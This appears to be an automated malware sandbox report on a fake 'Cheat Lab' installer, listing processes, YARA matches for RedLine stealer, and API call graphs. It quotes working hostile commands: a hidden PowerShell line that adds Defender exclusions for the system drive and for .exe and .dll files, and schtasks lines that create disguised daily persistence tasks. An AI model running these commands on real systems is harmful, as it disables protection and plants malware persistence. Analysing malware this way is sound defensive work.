                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat"
                                                                                                                                                                      Imagebase:0xa40000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:8
                                                                                                                                                                      Start time:15:35:03
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:9
                                                                                                                                                                      Start time:15:35:03
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                                                                                                                                                                      Imagebase:0x7ff738a30000
                                                                                                                                                                      File size:1'159'168 bytes
                                                                                                                                                                      MD5 hash:9CB9E0D0975E51A90BDED2B3BE8FACA9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:10
                                                                                                                                                                      Start time:15:35:03
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                                                                                                                                                                      Imagebase:0x770000
                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:13
                                                                                                                                                                      Start time:15:35:09
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                                                                                                                                                                      Imagebase:0x7ff738a30000
                                                                                                                                                                      File size:1'159'168 bytes
                                                                                                                                                                      MD5 hash:9CB9E0D0975E51A90BDED2B3BE8FACA9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:14
                                                                                                                                                                      Start time:15:35:10
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:schtasks /create /sc daily /st 11:45 /f /tn NotepadUpdateTask_NzEz /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua""
                                                                                                                                                                      Imagebase:0x7ff7dfdb0000
                                                                                                                                                                      File size:235'008 bytes
                                                                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:15
                                                                                                                                                                      Start time:15:35:10
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:schtasks /create /sc daily /st 11:45 /f /tn "LuaJIT" /tr ""C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua""
                                                                                                                                                                      Imagebase:0x7ff7dfdb0000
                                                                                                                                                                      File size:235'008 bytes
                                                                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:16
                                                                                                                                                                      Start time:15:35:10
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:17
                                                                                                                                                                      Start time:15:35:10
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:15:35:12
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua
                                                                                                                                                                      Imagebase:0x7ff6fdfd0000
                                                                                                                                                                      File size:1'159'168 bytes
                                                                                                                                                                      MD5 hash:9CB9E0D0975E51A90BDED2B3BE8FACA9
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:15:35:22
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                                                                                                                                                                      Imagebase:0x7ff738a30000
                                                                                                                                                                      File size:1'159'168 bytes
                                                                                                                                                                      MD5 hash:9CB9E0D0975E51A90BDED2B3BE8FACA9
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:15:35:30
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                                                                                                                                                                      Imagebase:0x7ff738a30000
                                                                                                                                                                      File size:1'159'168 bytes
                                                                                                                                                                      MD5 hash:9CB9E0D0975E51A90BDED2B3BE8FACA9
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:15:35:51
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:1'074'015'689 bytes
                                                                                                                                                                      MD5 hash:ADF3C225DDD9EEB90009F892A9A83D1B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2131526170.000000000040D000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2131675948.0000000000462000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.2133528800.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:25
                                                                                                                                                                      Start time:15:35:52
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:1.3%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:31.2%
                                                                                                                                                                        Total number of Nodes:320
                                                                                                                                                                        Total number of Limit Nodes:7
                                                                                                                                                                        execution_graph 33388 f53084 33389 f53090 __FrameHandler3::FrameUnwindToState 33388->33389 33414 f52de4 33389->33414 33391 f53097 33392 f531ea 33391->33392 33403 f530c1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 33391->33403 33448 f533a8 4 API calls 2 library calls 33392->33448 33394 f531f1 33449 f62ed9 23 API calls std::locale::_Setgloballocale 33394->33449 33396 f531f7 33450 f62e9d 23 API calls std::locale::_Setgloballocale 33396->33450 33398 f531ff 33399 f530e0 33400 f53161 33425 f534c3 GetStartupInfoW ctype 33400->33425 33402 f53167 33426 f3cdb0 GetCommandLineW 33402->33426 33403->33399 33403->33400 33447 f62eb3 41 API calls 4 library calls 33403->33447 33415 f52ded 33414->33415 33451 f535a9 IsProcessorFeaturePresent 33415->33451 33417 f52df9 33452 f558dc 10 API calls 2 library calls 33417->33452 33419 f52dfe 33420 f52e02 33419->33420 33453 f6393e 33419->33453 33420->33391 33423 f52e19 33423->33391 33425->33402 33427 f3cdf8 33426->33427 33512 f31f80 LocalAlloc 33427->33512 33429 f3ce09 33513 f369a0 33429->33513 33431 f3ce58 33432 f3ce69 33431->33432 33433 f3ce5c 33431->33433 33521 f3c6a0 LocalAlloc LocalAlloc 33432->33521 33605 f36600 98 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 33433->33605 33436 f3ce65 33438 f3ceb0 ExitProcess 33436->33438 33437 f3ce72 33522 f3c870 33437->33522 33443 f3cea4 33607 f3cec0 LocalFree LocalFree 33443->33607 33444 f3ce9a 33606 f3cce0 CreateFileW SetFilePointer WriteFile CloseHandle 33444->33606 33447->33400 33448->33394 33449->33396 33450->33398 33451->33417 33452->33419 33457 f6bedb 33453->33457 33456 f558fb 7 API calls 2 library calls 33456->33420 33458 f6beeb 33457->33458 33459 f52e0b 33457->33459 33458->33459 33461 f66d2d 33458->33461 33459->33423 33459->33456 33462 f66d39 __FrameHandler3::FrameUnwindToState 33461->33462 33473 f61c9a EnterCriticalSection 33462->33473 33464 f66d40 33474 f6c4cc 33464->33474 33467 f66d5e 33489 f66d84 LeaveCriticalSection std::_Lockit::~_Lockit 33467->33489 33470 f66d59 33488 f66c7d GetStdHandle GetFileType 33470->33488 33471 f66d6f 33471->33458 33473->33464 33475 f6c4d8 __FrameHandler3::FrameUnwindToState 33474->33475 33476 f6c502 33475->33476 33477 f6c4e1 33475->33477 33490 f61c9a EnterCriticalSection 33476->33490 33498 f57370 14 API calls __dosmaperr 33477->33498 33480 f6c4e6 33499 f57017 41 API calls __cftoe 33480->33499 33482 f66d4f 33482->33467 33487 f66bc7 44 API calls 33482->33487 33484 f6c50e 33486 f6c53a 33484->33486 33491 f6c41c 33484->33491 33500 f6c561 LeaveCriticalSection std::_Lockit::~_Lockit 33486->33500 33487->33470 33488->33467 33489->33471 33490->33484 33501 f670bb 33491->33501 33493 f6c43b 33509 f653b8 14 API calls __dosmaperr 33493->33509 33494 f6c42e 33494->33493 33508 f6776f 6 API calls std::_Locinfo::_Locinfo_dtor 33494->33508 33497 f6c490 33497->33484 33498->33480 33499->33482 33500->33482 33506 f670c8 __cftoe 33501->33506 33502 f67108 33511 f57370 14 API calls __dosmaperr 33502->33511 33503 f670f3 RtlAllocateHeap 33504 f67106 33503->33504 33503->33506 33504->33494 33506->33502 33506->33503 33510 f6bf83 EnterCriticalSection LeaveCriticalSection __cftoe 33506->33510 33508->33494 33509->33497 33510->33506 33511->33504 33512->33429 33516 f369f2 33513->33516 33514 f36a34 33515 f52937 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 33514->33515 33517 f36a42 33515->33517 33516->33514 33518 f36a22 33516->33518 33517->33431 33608 f52937 33518->33608 33520 f36a30 33520->33431 33521->33437 33524 f3c889 33522->33524 33528 f3cb32 33522->33528 33523 f3cb92 33616 f36250 14 API calls 33523->33616 33524->33523 33524->33528 33526 f3cba2 RegOpenKeyExW 33527 f3cbc0 RegQueryValueExW 33526->33527 33526->33528 33527->33528 33529 f36a50 33528->33529 33530 f36aa3 GetCurrentProcess OpenProcessToken 33529->33530 33531 f36a84 33529->33531 33535 f36b09 33530->33535 33548 f36adf 33530->33548 33532 f52937 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 33531->33532 33534 f36a9f 33532->33534 33534->33443 33534->33444 33617 f35de0 33535->33617 33536 f36b02 33665 f357c0 GetCurrentProcess OpenProcessToken 33536->33665 33537 f36af4 CloseHandle 33537->33536 33541 f36b20 33543 f31770 42 API calls 33541->33543 33542 f36b2e 33544 f36b32 33542->33544 33545 f36b3f 33542->33545 33543->33548 33549 f31770 42 API calls 33544->33549 33620 f35f40 ConvertSidToStringSidW 33545->33620 33546 f36c29 33547 f36ddb 33546->33547 33555 f36c43 33546->33555 33670 f32310 56 API calls 33547->33670 33548->33536 33548->33537 33549->33548 33553 f36e04 33556 f36f2d 33553->33556 33671 f346f0 52 API calls 33553->33671 33722 f32310 56 API calls 33555->33722 33735 f311d0 RaiseException CallUnexpected 33556->33735 33558 f36c57 33558->33556 33723 f346f0 52 API calls 33558->33723 33562 f36b85 33651 f32e60 33562->33651 33565 f36e59 33672 f32310 56 API calls 33565->33672 33566 f32e60 42 API calls 33569 f36bf5 33566->33569 33657 f31770 33569->33657 33570 f36e29 33570->33565 33732 f34ac0 42 API calls 3 library calls 33570->33732 33571 f36e68 33571->33556 33673 f346f0 52 API calls 33571->33673 33573 f36cad 33725 f32310 56 API calls 33573->33725 33577 f36c16 FindCloseChangeNotification 33577->33536 33578 f36c7c 33578->33573 33724 f34ac0 42 API calls 3 library calls 33578->33724 33579 f36cc7 33579->33556 33726 f346f0 52 API calls 33579->33726 33582 f36eb9 33674 f32310 56 API calls 33582->33674 33585 f36e8a 33585->33582 33733 f34ac0 42 API calls 3 library calls 33585->33733 33586 f36ec4 33586->33556 33675 f346f0 52 API calls 33586->33675 33587 f36d19 33728 f32310 56 API calls 33587->33728 33590 f36ce9 33590->33587 33727 f34ac0 42 API calls 3 library calls 33590->33727 33591 f36d24 33591->33556 33729 f346f0 52 API calls 33591->33729 33594 f36f10 33676 f352f0 33594->33676 33597 f36ee6 33597->33594 33734 f34ac0 42 API calls 3 library calls 33597->33734 33598 f36d70 33731 f34ba0 178 API calls 3 library calls 33598->33731 33601 f36d4e 33730 f34ac0 42 API calls 3 library calls 33601->33730 33602 f36d46 33602->33598 33602->33601 33602->33602 33603 f36d8a 33603->33556 33605->33436 33606->33443 33607->33438 33609 f52940 IsProcessorFeaturePresent 33608->33609 33610 f5293f 33608->33610 33612 f529a5 33609->33612 33610->33520 33615 f52968 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33612->33615 33614 f52a88 33614->33520 33615->33614 33616->33526 33736 f35e40 GetTokenInformation 33617->33736 33621 f35fd2 33620->33621 33623 f35fac 33620->33623 33622 f324c0 47 API calls 33621->33622 33624 f35fc9 33622->33624 33623->33623 33625 f324c0 47 API calls 33623->33625 33626 f36003 33624->33626 33627 f35ff5 LocalFree 33624->33627 33625->33624 33628 f324c0 33626->33628 33627->33626 33630 f324d1 _LStrxfrm 33628->33630 33631 f324fd 33628->33631 33629 f325f5 33747 f32770 42 API calls 33629->33747 33630->33562 33631->33629 33632 f32515 33631->33632 33635 f325f0 33631->33635 33639 f32582 33631->33639 33632->33635 33636 f32566 LocalAlloc 33632->33636 33634 f325fa 33748 f57027 41 API calls 2 library calls 33634->33748 33746 f32d70 RaiseException CallUnexpected 33635->33746 33636->33634 33641 f32577 33636->33641 33644 f32586 LocalAlloc 33639->33644 33648 f32593 _LStrxfrm 33639->33648 33641->33648 33644->33648 33647 f325e5 33647->33562 33648->33634 33648->33647 33649 f325d8 33648->33649 33649->33647 33650 f325de LocalFree 33649->33650 33650->33647 33652 f32eb7 33651->33652 33653 f32e8d 33651->33653 33652->33566 33653->33651 33654 f32eaa 33653->33654 33749 f57027 41 API calls 2 library calls 33653->33749 33654->33652 33655 f32eb0 LocalFree 33654->33655 33655->33652 33658 f3179b 33657->33658 33662 f317c1 33657->33662 33659 f317ba LocalFree 33658->33659 33660 f317e5 33658->33660 33661 f317b4 33658->33661 33659->33662 33750 f57027 41 API calls 2 library calls 33660->33750 33661->33659 33661->33662 33662->33536 33662->33577 33666 f357e1 33665->33666 33667 f357e7 GetTokenInformation 33665->33667 33666->33546 33668 f35816 33667->33668 33669 f3581e CloseHandle 33667->33669 33668->33669 33669->33546 33670->33553 33671->33570 33672->33571 33673->33585 33674->33586 33675->33597 33677 f35361 33676->33677 33751 f35d30 33677->33751 33679 f3537b 33680 f35d30 41 API calls 33679->33680 33681 f3538b 33680->33681 33755 f359c0 33681->33755 33683 f357b0 33774 f311d0 RaiseException CallUnexpected 33683->33774 33686 f3539b 33686->33683 33763 f57852 33686->33763 33689 f353e1 33690 f35d30 41 API calls 33689->33690 33703 f353f5 33690->33703 33691 f354cc 33692 f3551d GetForegroundWindow 33691->33692 33716 f35529 33691->33716 33692->33716 33693 f355f7 ShellExecuteExW 33694 f35612 33693->33694 33695 f35609 33693->33695 33696 f35646 33694->33696 33699 f35625 ShellExecuteExW 33694->33699 33772 f35890 6 API calls 33695->33772 33706 f356fd 33696->33706 33707 f3566c GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 33696->33707 33697 f35493 GetWindowsDirectoryW 33770 f35b10 70 API calls 33697->33770 33699->33696 33701 f3563d 33699->33701 33773 f35890 6 API calls 33701->33773 33702 f354b4 33771 f35b10 70 API calls 33702->33771 33703->33691 33703->33697 33708 f35721 33706->33708 33710 f3570e WaitForSingleObject GetExitCodeProcess 33706->33710 33707->33706 33709 f35698 33707->33709 33766 f35940 33708->33766 33709->33706 33712 f356a1 GetModuleHandleW GetProcAddress 33709->33712 33710->33708 33713 f356b4 33712->33713 33714 f356fa 33712->33714 33718 f356c8 Sleep EnumWindows 33713->33718 33719 f356ed 33713->33719 33714->33706 33716->33693 33717 f52937 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 33721 f357a8 33717->33721 33718->33713 33718->33719 33844 f35830 GetWindowThreadProcessId GetWindowLongW 33718->33844 33719->33714 33720 f356f3 BringWindowToTop 33719->33720 33720->33714 33721->33556 33722->33558 33723->33578 33724->33573 33725->33579 33726->33590 33727->33587 33728->33591 33729->33602 33730->33598 33731->33603 33732->33565 33733->33582 33734->33594 33737 f35e18 33736->33737 33738 f35ebe GetLastError 33736->33738 33737->33541 33737->33542 33738->33737 33739 f35ec9 33738->33739 33740 f35ed9 ctype 33739->33740 33741 f35f0e GetTokenInformation 33739->33741 33742 f35ee9 33739->33742 33740->33741 33741->33737 33745 f360d0 45 API calls 3 library calls 33742->33745 33744 f35ef2 33744->33741 33745->33744 33752 f35d6e 33751->33752 33754 f35d7d 33752->33754 33775 f34a10 41 API calls 4 library calls 33752->33775 33754->33679 33756 f359f8 33755->33756 33760 f35a03 33755->33760 33757 f35d30 41 API calls 33756->33757 33759 f35a01 33757->33759 33759->33686 33761 f35a1a 33760->33761 33776 f32310 56 API calls 33760->33776 33777 f35a60 42 API calls 33761->33777 33778 f57869 33763->33778 33767 f35971 33766->33767 33768 f3572d 33766->33768 33767->33768 33769 f35981 FindCloseChangeNotification 33767->33769 33768->33717 33769->33768 33770->33702 33771->33691 33772->33694 33773->33696 33775->33754 33776->33761 33777->33759 33783 f57078 33778->33783 33784 f57096 33783->33784 33785 f5708f 33783->33785 33784->33785 33828 f657cc 41 API calls 3 library calls 33784->33828 33791 f576d9 33785->33791 33787 f570b7 33829 f65ab7 41 API calls __Getctype 33787->33829 33789 f570cd 33830 f65b15 41 API calls __cftoe 33789->33830 33793 f57709 ___crtCompareStringW 33791->33793 33796 f576f3 33791->33796 33795 f57720 33793->33795 33793->33796 33794 f576f8 33832 f57017 41 API calls __cftoe 33794->33832 33799 f57702 33795->33799 33833 f65c2a 6 API calls 2 library calls 33795->33833 33831 f57370 14 API calls __dosmaperr 33796->33831 33803 f52937 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 33799->33803 33800 f5776e 33801 f5778f 33800->33801 33802 f57778 33800->33802 33805 f577a5 33801->33805 33806 f57794 33801->33806 33834 f57370 14 API calls __dosmaperr 33802->33834 33807 f353d3 33803->33807 33808 f57826 33805->33808 33811 f577cc 33805->33811 33818 f577b9 __alloca_probe_16 33805->33818 33836 f57370 14 API calls __dosmaperr 33806->33836 33807->33683 33807->33689 33841 f57370 14 API calls __dosmaperr 33808->33841 33809 f5777d 33835 f57370 14 API calls __dosmaperr 33809->33835 33837 f65bdc 15 API calls 2 library calls 33811->33837 33814 f5782b 33842 f57370 14 API calls __dosmaperr 33814->33842 33817 f577d2 33817->33808 33817->33818 33818->33808 33821 f577e6 33818->33821 33819 f57813 33843 f52326 14 API calls ~collate 33819->33843 33838 f65c2a 6 API calls 2 library calls 33821->33838 33823 f57802 33824 f57809 33823->33824 33825 f5781a 33823->33825 33839 f5b762 41 API calls 2 library calls 33824->33839 33840 f57370 14 API calls __dosmaperr 33825->33840 33828->33787 33829->33789 33830->33785 33831->33794 33832->33799 33833->33800 33834->33809 33835->33799 33836->33794 33837->33817 33838->33823 33839->33819 33840->33819 33841->33814 33842->33819 33843->33799

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00F352F0 Relevance: 54.7, APIs: 15, Strings: 16, Instructions: 402libraryloadersleepCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 f352f0-f353a8 call f363a0 call f35d30 * 2 call f359c0 9 f357b0-f357ba call f311d0 0->9 10 f353ae-f353bd 0->10 12 f353c9-f353db call f57852 10->12 13 f353bf-f353c7 call f349a0 10->13 12->9 19 f353e1-f3540a call f35d30 12->19 13->12 22 f35414-f35419 19->22 23 f3540c-f3540f 19->23 24 f354cf-f3551b 22->24 25 f3541f-f35429 22->25 23->22 27 f35529-f3552b 24->27 28 f3551d-f35526 GetForegroundWindow 24->28 26 f35430-f35436 25->26 29 f35456-f35458 26->29 30 f35438-f3543b 26->30 31 f35531-f35535 27->31 32 f355f7-f35607 ShellExecuteExW 27->32 28->27 35 f3545b-f3545d 29->35 33 f35452-f35454 30->33 34 f3543d-f35445 30->34 36 f35540-f3554c 31->36 37 f35537-f3553e 31->37 38 f35614-f35616 32->38 39 f35609-f35612 call f35890 32->39 33->35 34->29 42 f35447-f35450 34->42 43 f35493-f354cc GetWindowsDirectoryW call f35b10 * 2 35->43 44 f3545f 35->44 45 f35550-f3555d 36->45 37->36 37->37 40 f35646-f35666 call f35b30 38->40 41 f35618-f3561e 38->41 39->38 64 f356fd-f35702 40->64 65 f3566c-f35696 GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 40->65 47 f35620-f35623 41->47 48 f35625-f3563b ShellExecuteExW 41->48 42->26 42->33 43->24 51 f35464-f3546a 44->51 45->45 52 f3555f-f3556b 45->52 47->40 47->48 48->40 54 f3563d-f35641 call f35890 48->54 57 f3548a-f3548c 51->57 58 f3546c-f3546f 51->58 59 f35570-f3557d 52->59 54->40 61 f3548f-f35491 57->61 66 f35471-f35479 58->66 67 f35486-f35488 58->67 59->59 60 f3557f-f355f5 call f364a0 * 5 59->60 60->32 61->24 61->43 69 f35721-f35728 call f35940 64->69 70 f35704-f3570c 64->70 65->64 72 f35698-f3569f 65->72 66->57 73 f3547b-f35484 66->73 67->61 79 f3572d-f35744 69->79 70->69 75 f3570e-f3571b WaitForSingleObject GetExitCodeProcess 70->75 72->64 77 f356a1-f356b2 GetModuleHandleW GetProcAddress 72->77 73->51 73->67 75->69 80 f356b4-f356c1 77->80 81 f356fa 77->81 83 f35746-f35749 79->83 84 f3574e-f35762 79->84 92 f356c3-f356c6 80->92 81->64 83->84 86 f35764-f35767 84->86 87 f3576c-f35781 84->87 86->87 89 f35783-f35786 87->89 90 f3578b-f357af call f52937 87->90 89->90 95 f356c8-f356eb Sleep EnumWindows 92->95 96 f356ef-f356f1 92->96 95->92 97 f356ed 95->97 96->81 98 f356f3-f356f4 BringWindowToTop 96->98 97->98 98->81
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00F3549C
                                                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00F3551D
                                                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00F35601
                                                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00F35637
